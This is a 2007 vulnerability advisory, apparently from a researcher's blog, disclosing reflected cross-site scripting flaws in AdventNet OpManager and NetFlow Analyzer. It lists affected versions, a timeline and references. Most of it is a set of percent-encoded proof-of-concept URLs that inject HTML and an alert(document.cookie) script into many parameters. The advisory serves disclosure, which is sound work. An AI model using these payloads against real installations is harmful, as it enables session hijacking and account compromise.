###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)